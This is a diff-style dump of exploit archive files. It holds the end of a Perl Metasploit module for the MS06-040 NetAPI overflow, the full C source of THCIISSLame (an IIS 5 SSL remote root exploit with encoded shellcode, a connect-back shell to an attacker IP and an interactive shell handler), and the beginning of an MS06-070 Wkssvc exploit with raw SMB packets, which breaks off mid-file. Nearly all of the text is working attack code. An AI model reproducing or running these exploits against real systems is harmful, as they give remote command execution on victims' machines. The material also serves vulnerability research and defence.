+	'Payload' =>
-	  {
+	  {
-	  	# Technically we can use more space than this, but by limiting it
+	  	# Technically we can use more space than this, but by limiting it
-		# to 370 bytes we can use the same request for all Windows SPs.
+		# to 370 bytes we can use the same request for all Windows SPs.
-		'Space'    => 370,
+		'Space'    => 370,
-		
+		
-		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
+		'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
-		'Keys'     => ['+ws2ord'],
+		'Keys'     => ['+ws2ord'],
-
+
-		# sub esp, 4097 + inc esp makes stack happy
+		# sub esp, 4097 + inc esp makes stack happy
-		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
-	  },
+	  },
-
+
-	'Description' => Pex::Text::Freeform(
+	'Description' => Pex::Text::Freeform(
-		qq{
+		qq{
-		This exploit modified from netapi_ms06_040.pm (Metasploit).
+		This exploit modified from netapi_ms06_040.pm (Metasploit).
-		While netapi_ms06_040 of metasploit works on Windows 2000 
+		While netapi_ms06_040 of metasploit works on Windows 2000 
-		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
+		SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on
-		Windows Server 2003 SP0.
+		Windows Server 2003 SP0.
-	  }
+	  }
-	  ),
+	  ),
-
+
-	'Refs' =>
+	'Refs' =>
-	  [
+	  [
-		[ 'BID', '19409' ],
+		[ 'BID', '19409' ],
-		[ 'CVE', '2006-3439' ],
+		[ 'CVE', '2006-3439' ],
-		[ 'MSB', 'MS06-040' ],
+		[ 'MSB', 'MS06-040' ],
-	  ],
+	  ],
-
+
-	'DefaultTarget' => 0,
+	'DefaultTarget' => 0,
-	'Targets'       =>
+	'Targets'       =>
-	  [
+	  [
-		[ '(wcscpy) Windows Server 2003 SP0', 612],
+		[ '(wcscpy) Windows Server 2003 SP0', 612],
-	  ],
+	  ],
-
+
-	'Keys' => ['srvsvc'],
+	'Keys' => ['srvsvc'],
-
+
-	'DisclosureDate' => '',
+	'DisclosureDate' => '',
-  };
+  };
-
+
-sub new {
+sub new {
-	my ($class) = @_;
+	my ($class) = @_;
-	my $self =
+	my $self =
-	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
+	  $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
-	return ($self);
+	return ($self);
-}
+}
-
+
-sub Exploit {
+sub Exploit {
-	my ($self)      = @_;
+	my ($self)      = @_;
-	my $target_host = $self->GetVar('RHOST');
+	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
+	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
+	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target_name = '*SMBSERVER';
+	my $target_name = '*SMBSERVER';
-
+
-	my $FragSize = $self->GetVar('FragSize') || 256;
+	my $FragSize = $self->GetVar('FragSize') || 256;
-	my $target   = $self->Targets->[$target_idx];
+	my $target   = $self->Targets->[$target_idx];
-
+
-	if (!$self->InitNops(128)) {
+	if (!$self->InitNops(128)) {
-		$self->PrintLine("Could not initialize the nop module");
+		$self->PrintLine("Could not initialize the nop module");
-		return;
+		return;
-	}
+	}
-
+
-	my ( $res, $rpc );
+	my ( $res, $rpc );
-
+
-	my $pipe    = '\BROWSER';
+	my $pipe    = '\BROWSER';
-	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
+	my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
-	my $version = '3.0';
+	my $version = '3.0';
-
+
-	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );
+	my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );
-
+
-	my $dce = Pex::DCERPC->new(
+	my $dce = Pex::DCERPC->new(
-		'handle'      => $handle,
+		'handle'      => $handle,
-		'username'    => $self->GetVar('SMBUSER'),
+		'username'    => $self->GetVar('SMBUSER'),
-		'password'    => $self->GetVar('SMBPASS'),
+		'password'    => $self->GetVar('SMBPASS'),
-		'domain'      => $self->GetVar('SMBDOM'),
+		'domain'      => $self->GetVar('SMBDOM'),
-		'fragsize'    => $self->GetVar('FragSize'),
+		'fragsize'    => $self->GetVar('FragSize'),
-		'bindevasion' => $self->GetVar('BindEvasion'),
+		'bindevasion' => $self->GetVar('BindEvasion'),
-		'directsmb'   => $self->GetVar('DirectSMB'),
+		'directsmb'   => $self->GetVar('DirectSMB'),
-	  );
+	  );
-
+
-	if ( !$dce ) {
+	if ( !$dce ) {
-		$self->PrintLine("[*] Could not bind to $handle");
+		$self->PrintLine("[*] Could not bind to $handle");
-		return;
+		return;
-	}
+	}
-
+
-	my $smb = $dce->{'_handles'}{$handle}{'connection'};
+	my $smb = $dce->{'_handles'}{$handle}{'connection'};
-	
+	
-	if (! $smb) {
+	if (! $smb) {
-		$self->PrintLine("[*] Could not establish SMB session");
+		$self->PrintLine("[*] Could not establish SMB session");
-		return;
+		return;
-	}
+	}
-
+
-	my $stub;
+	my $stub;
-
+
-	#
+	#
-	# Use the wcscpy() method on Windows Server 2003 SP0
+	# Use the wcscpy() method on Windows Server 2003 SP0
-	#	
+	#	
-	if ($target->[0] =~ /2003/) {
+	if ($target->[0] =~ /2003/) {
-
+
-		my $path = 	
+		my $path = 	
-			$shellcode.
+			$shellcode.
-
+
-			# Padding
+			# Padding
-			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
+			Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
-			Pex::Text::AlphaNumText(32).
+			Pex::Text::AlphaNumText(32).
-			substr($shellcode, 0, 4).	# cookie
+			substr($shellcode, 0, 4).	# cookie
-			Pex::Text::AlphaNumText(4).
+			Pex::Text::AlphaNumText(4).
-			# return address == address that store security cookie
+			# return address == address that store security cookie
-			("\xec\xc1\xc8\x71") . 
+			("\xec\xc1\xc8\x71") . 
-			Pex::Text::AlphaNumText(8).
+			Pex::Text::AlphaNumText(8).
-
+
-			("\xec\xc1\xc8\x71" x 2) .
+			("\xec\xc1\xc8\x71" x 2) .
-			Pex::Text::AlphaNumText(36).
+			Pex::Text::AlphaNumText(36).
-
+
-			# Terminate
+			# Terminate
-			"\x00\x00";
+			"\x00\x00";
-
+
-
+
-		# Package that into a stub
+		# Package that into a stub
-		$stub =
+		$stub =
-			Pex::NDR::Long(int(rand(0xffffffff))).
+			Pex::NDR::Long(int(rand(0xffffffff))).
-			Pex::NDR::UnicodeConformantVaryingString('').
+			Pex::NDR::UnicodeConformantVaryingString('').
-			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
+			Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
-			Pex::NDR::Long(int(rand(250)+1)).
+			Pex::NDR::Long(int(rand(250)+1)).
-			Pex::NDR::UnicodeConformantVaryingString('').
+			Pex::NDR::UnicodeConformantVaryingString('').
-			Pex::NDR::Long(int(rand(250)+1)).
+			Pex::NDR::Long(int(rand(250)+1)).
-			Pex::NDR::Long(0);
+			Pex::NDR::Long(0);
-	}
+	}
-	else {
+	else {
-		$self->PrintLine("This target is not currently supported");
+		$self->PrintLine("This target is not currently supported");
-		return;
+		return;
-	}
+	}
-
+
-
+
-	$self->PrintLine("[*] Sending request...");
+	$self->PrintLine("[*] Sending request...");
-	
+	
-	# Function 0x1f is not the only way to exploit this :-)
+	# Function 0x1f is not the only way to exploit this :-)
-	my @response = $dce->request( $handle, 0x1f, $stub );
+	my @response = $dce->request( $handle, 0x1f, $stub );
-	
+	
-	if ( length($dce->{'response'}->{'StubData'}) > 0) {
+	if ( length($dce->{'response'}->{'StubData'}) > 0) {
-		$self->PrintLine("[*] The server rejected it, trying again...");
+		$self->PrintLine("[*] The server rejected it, trying again...");
-		@response = $dce->request( $handle, 0x1f, $stub );
+		@response = $dce->request( $handle, 0x1f, $stub );
-	}
+	}
-	
+	
-	if ( length($dce->{'response'}->{'StubData'}) > 0) {
+	if ( length($dce->{'response'}->{'StubData'}) > 0) {
-		$self->PrintLine("[*] Exploit Failed");
+		$self->PrintLine("[*] Exploit Failed");
-	}
+	}
-	
+	
-	if (@response) {
+	if (@response) {
-		$self->PrintLine('[*] RPC server responded with:');
+		$self->PrintLine('[*] RPC server responded with:');
-		foreach my $line (@response) {
+		foreach my $line (@response) {
-			$self->PrintLine( '[*] ' . $line );
+			$self->PrintLine( '[*] ' . $line );
-		}
+		}
-	}
+	}
-
+
-	return;
+	return;
-}
+}
-
+
-1;
+1;
-
+
-# milw0rm.com [2006-09-13]
+# milw0rm.com [2006-09-13]
--- a/platforms/windows/remote/275.c
+++ b/platforms/windows/remote/275.c
@ -1,255 +1,255 @@
-/*****************************************************************************/
+/*****************************************************************************/
-/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
+/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit                           */
-/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
-/* THC PUBLIC SOURCE MATERIALS                                               */
+/* THC PUBLIC SOURCE MATERIALS                                               */
-/*                                                                           */
+/*                                                                           */
-/* Bug was found by Internet Security Systems                                */
+/* Bug was found by Internet Security Systems                                */
-/* Reversing credits of the bug go to Halvar Flake                           */
+/* Reversing credits of the bug go to Halvar Flake                           */
-/*                                                                           */
+/*                                                                           */
-/* compile with MS Visual C++ : cl THCIISSLame.c                             */
+/* compile with MS Visual C++ : cl THCIISSLame.c                             */
-/*                                                                           */
+/*                                                                           */
-/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
+/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports      */
-/* v0.2 - This little update uses a connectback shell !                      */
+/* v0.2 - This little update uses a connectback shell !                      */
-/* v0.1 - First release with portbinding shell on 31337                      */
+/* v0.1 - First release with portbinding shell on 31337                      */
-/*                                                                           */
+/*                                                                           */
-/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
-/* scut, stealth, FtR and Random                                             */
+/* scut, stealth, FtR and Random                                             */
-/*****************************************************************************/
+/*****************************************************************************/
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <string.h>
+#include <string.h>
-#include <winsock2.h>
+#include <winsock2.h>
-
+
-#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "ws2_32.lib")
-
+
-#define jumper    "\xeb\x0f"
+#define jumper    "\xeb\x0f"
-#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
+#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
-
+
-char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
+char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
-
+
-char shellcode[] =
+char shellcode[] =
-"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
+"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
-"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
+"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
-"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
+"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
-"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
+"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
-"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
+"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
-"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
+"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
-"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
+"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
-"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
+"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
-"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
+"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
-"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
+"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
-"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
+"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
-"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
+"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
-"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
+"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
-"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
+"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
-"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
+"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
-"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
+"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
-"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
+"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
-"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
+"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
-"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
+"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
-"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
+"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
-"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
+"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
-"\x55\xe4";
+"\x55\xe4";
-
+
-void usage();
+void usage();
-void shell(int sock);
+void shell(int sock);
-
+
-int main(int argc, char *argv[])
+int main(int argc, char *argv[])
-{  
+{  
-  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
+  unsigned int i,sock,sock2,sock3,addr,rc,len=16;
-  unsigned char *badbuf,*p;
+  unsigned char *badbuf,*p;
-  unsigned long offset = 0x6741a1cd;
+  unsigned long offset = 0x6741a1cd;
-  unsigned long XOR = 0xffffffff;
+  unsigned long XOR = 0xffffffff;
-  unsigned long XORIP = 0x93939393;
+  unsigned long XORIP = 0x93939393;
-  unsigned short XORPORT = 0x9393;
+  unsigned short XORPORT = 0x9393;
-
+
-  unsigned short cbport;
+  unsigned short cbport;
-  unsigned long  cbip;
+  unsigned long  cbip;
-
+
-  struct sockaddr_in mytcp;
+  struct sockaddr_in mytcp;
-  struct hostent * hp;
+  struct hostent * hp;
-  WSADATA wsaData;
+  WSADATA wsaData;
-
+
-  printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
+  printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
-  printf("tested on Windows 2000 Server german/english SP4\n");
+  printf("tested on Windows 2000 Server german/english SP4\n");
-  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
-
+
-  if(argc<4 || argc>4)
+  if(argc<4 || argc>4)
-   usage();
+   usage();
-
+
-  badbuf = malloc(352);
+  badbuf = malloc(352);
-  memset(badbuf,0,352);
+  memset(badbuf,0,352);
-
+
-  printf("\n[*] building buffer\n");
+  printf("\n[*] building buffer\n");
-
+
-  p = badbuf;
+  p = badbuf;
-
+
-  memcpy(p,sslshit,sizeof(sslshit));
+  memcpy(p,sslshit,sizeof(sslshit));
-
+
-  p+=sizeof(sslshit)-1;
+  p+=sizeof(sslshit)-1;
-  
+  
-  strcat(p,jumper);
+  strcat(p,jumper);
-
+
-  strcat(p,greetings_to_microsoft);
+  strcat(p,greetings_to_microsoft);
-
+
-  offset^=XOR;
+  offset^=XOR;
-  strncat(p,(unsigned char *)&offset,4);
+  strncat(p,(unsigned char *)&offset,4);
-
+
-  cbport = htons((unsigned short)atoi(argv[3]));
+  cbport = htons((unsigned short)atoi(argv[3]));
-  cbip = inet_addr(argv[2]);
+  cbip = inet_addr(argv[2]);
-  cbport ^= XORPORT;
+  cbport ^= XORPORT;
-  cbip ^= XORIP;
+  cbip ^= XORIP;
-  memcpy(&shellcode[2],&cbport,2);
+  memcpy(&shellcode[2],&cbport,2);
-  memcpy(&shellcode[4],&cbip,4);
+  memcpy(&shellcode[4],&cbip,4);
-
+
-  strcat(p,shellcode);
+  strcat(p,shellcode);
-  
+  
-  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
-  {
+  {
-   printf("WSAStartup failed !\n");
+   printf("WSAStartup failed !\n");
-   exit(-1);
+   exit(-1);
-  }
+  }
-  
+  
-  hp = gethostbyname(argv[1]);
+  hp = gethostbyname(argv[1]);
-
+
-  if (!hp){
+  if (!hp){
-   addr = inet_addr(argv[1]);
+   addr = inet_addr(argv[1]);
-  }
+  }
-  if ((!hp)  && (addr == INADDR_NONE) )
+  if ((!hp)  && (addr == INADDR_NONE) )
-  {
+  {
-   printf("Unable to resolve %s\n",argv[1]);
+   printf("Unable to resolve %s\n",argv[1]);
-   exit(-1);
+   exit(-1);
-  }
+  }
-
+
-  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-  if (!sock)
+  if (!sock)
-  { 
+  { 
-   printf("socket() error...\n");
+   printf("socket() error...\n");
-   exit(-1);
+   exit(-1);
-  }
+  }
-  
+  
-  if (hp != NULL)
+  if (hp != NULL)
-   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
-  else
+  else
-   mytcp.sin_addr.s_addr = addr;
+   mytcp.sin_addr.s_addr = addr;
-
+
-  if (hp)
+  if (hp)
-   mytcp.sin_family = hp->h_addrtype;
+   mytcp.sin_family = hp->h_addrtype;
-  else
+  else
-   mytcp.sin_family = AF_INET;
+   mytcp.sin_family = AF_INET;
-
+
-  mytcp.sin_port=htons(443);
+  mytcp.sin_port=htons(443);
-
+
-  printf("[*] connecting the target\n");
+  printf("[*] connecting the target\n");
-
+
-  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
-  if(rc==0)
+  if(rc==0)
-  {
+  {
-      send(sock,badbuf,351,0);
+      send(sock,badbuf,351,0);
-      printf("[*] exploit send\n");
+      printf("[*] exploit send\n");
-  
+  
-      mytcp.sin_addr.s_addr = 0;
+      mytcp.sin_addr.s_addr = 0;
-      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
+      mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
-
+
-      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+      sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-      
+      
-      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
+      rc=bind(sock2,(struct sockaddr *)&mytcp,16);
-      if(rc!=0)
+      if(rc!=0)
-      {
+      {
-       printf("bind error() %d\n",WSAGetLastError());
+       printf("bind error() %d\n",WSAGetLastError());
-       exit(-1);
+       exit(-1);
-      }
+      }
-   
+   
-      rc=listen(sock2,1);
+      rc=listen(sock2,1);
-      if(rc!=0)
+      if(rc!=0)
-      {
+      {
-       printf("listen error()\n");
+       printf("listen error()\n");
-       exit(-1);
+       exit(-1);
-      }
+      }
-
+
-      printf("[*] waiting for shell\n");
+      printf("[*] waiting for shell\n");
-      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
+      sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); 
-      if(sock3)
+      if(sock3)
-      { 
+      { 
-       printf("[*] Exploit successful ! Have fun !\n");
+       printf("[*] Exploit successful ! Have fun !\n");
-       printf("[*] --------------------------------------------------------------------\n\n");
+       printf("[*] --------------------------------------------------------------------\n\n");
-       shell(sock3);
+       shell(sock3);
-      }
+      }
-  }
+  }
-  else
+  else
-  {
+  {
-   printf("\nCan't connect to ssl port 443!\n");
+   printf("\nCan't connect to ssl port 443!\n");
-   exit(-1);
+   exit(-1);
-  }
+  }
-  
+  
-  shutdown(sock,1);
+  shutdown(sock,1);
-  closesocket(sock);
+  closesocket(sock);
-  shutdown(sock,2);
+  shutdown(sock,2);
-  closesocket(sock2);
+  closesocket(sock2);
-  shutdown(sock,3);
+  shutdown(sock,3);
-  closesocket(sock3);
+  closesocket(sock3);
-
+
-  free(badbuf);
+  free(badbuf);
-
+
-  exit(0);
+  exit(0);
-}
+}
- 
+ 
-void usage()
+void usage()
-{
+{
- unsigned int a;
+ unsigned int a;
- printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
+ printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
- printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
+ printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
- exit(0);
+ exit(0);
-}
+}
-
+
-void shell(int sock)
+void shell(int sock)
-{
+{
- int l;
+ int l;
- char buf[1024];
+ char buf[1024];
- struct timeval time;
+ struct timeval time;
- unsigned long ul[2];
+ unsigned long ul[2];
-
+
- time.tv_sec = 1;
+ time.tv_sec = 1;
- time.tv_usec = 0;
+ time.tv_usec = 0;
-
+
- while (1)
+ while (1)
- {
+ {
-  ul[0] = 1;
+  ul[0] = 1;
-  ul[1] = sock;
+  ul[1] = sock;
-
+
-  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
+  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
-  if(l == 1)
+  if(l == 1)
-  {  	
+  {  	
-   l = recv (sock, buf, sizeof (buf), 0);
+   l = recv (sock, buf, sizeof (buf), 0);
-   if (l <= 0)
+   if (l <= 0)
-   {
+   {
-    printf ("bye bye...\n");
+    printf ("bye bye...\n");
-    return;
+    return;
-   }
+   }
-  l = write (1, buf, l);
+  l = write (1, buf, l);
-   if (l <= 0)
+   if (l <= 0)
-   {
+   {
-    printf ("bye bye...\n");
+    printf ("bye bye...\n");
-    return;
+    return;
-   }
+   }
-  }
+  }
-  else
+  else
-  {
+  {
-   l = read (0, buf, sizeof (buf));
+   l = read (0, buf, sizeof (buf));
-   if (l <= 0)
+   if (l <= 0)
-   {
+   {
-    printf("bye bye...\n");
+    printf("bye bye...\n");
-    return;
+    return;
-   }
+   }
-   l = send(sock, buf, l, 0);
+   l = send(sock, buf, l, 0);
-   if (l <= 0)
+   if (l <= 0)
-   {
+   {
-    printf("bye bye...\n");
+    printf("bye bye...\n");
-    return;
+    return;
-   }
+   }
-  }
+  }
- }
+ }
-}
+}
-
+
-// milw0rm.com [2004-04-21]
+// milw0rm.com [2004-04-21]
--- a/platforms/windows/remote/2789.cpp
+++ b/platforms/windows/remote/2789.cpp
@ -1,421 +1,421 @@
-/***************************************************************************
+/***************************************************************************
-
+
-Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
+Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
-
+
-by cocoruder(frankruder_at_hotmail.com),2006.11.15
+by cocoruder(frankruder_at_hotmail.com),2006.11.15
-page:http://ruder.cdut.net/default.asp
+page:http://ruder.cdut.net/default.asp
-
+
-successfully test on Windows 2000 Server SP4(chinese)
+successfully test on Windows 2000 Server SP4(chinese)
-
+
-usage:
+usage:
-ms06070 targetip DomainName
+ms06070 targetip DomainName
-
+
-notice:
+notice:
-Make sure the DomainName is valid and live,more informations see
+Make sure the DomainName is valid and live,more informations see
-http://research.eeye.com/html/advisories/published/AD20061114.html,
+http://research.eeye.com/html/advisories/published/AD20061114.html,
-cocoruder just research the vulnerability and give the exploit for
+cocoruder just research the vulnerability and give the exploit for
-Win2000.
+Win2000.
-****************************************************************************/
+****************************************************************************/
-
+
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-#include <winsock.h>
+#include <winsock.h>
-#include <tchar.h>
+#include <tchar.h>
-
+
-
+
-unsigned char SmbNeg[] =
+unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
+
-
+
-unsigned char Session_Setup_AndX_Request[]=
+unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
+"\x62\x00";
-
+
-
+
-unsigned char TreeConnect_AndX_Request[]=
+unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
-"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
-"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
-"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
-"\x3f\x00";
+"\x3f\x00";
-
+
-
+
-unsigned char NTCreate_AndX_Request[]=
+unsigned char NTCreate_AndX_Request[]=
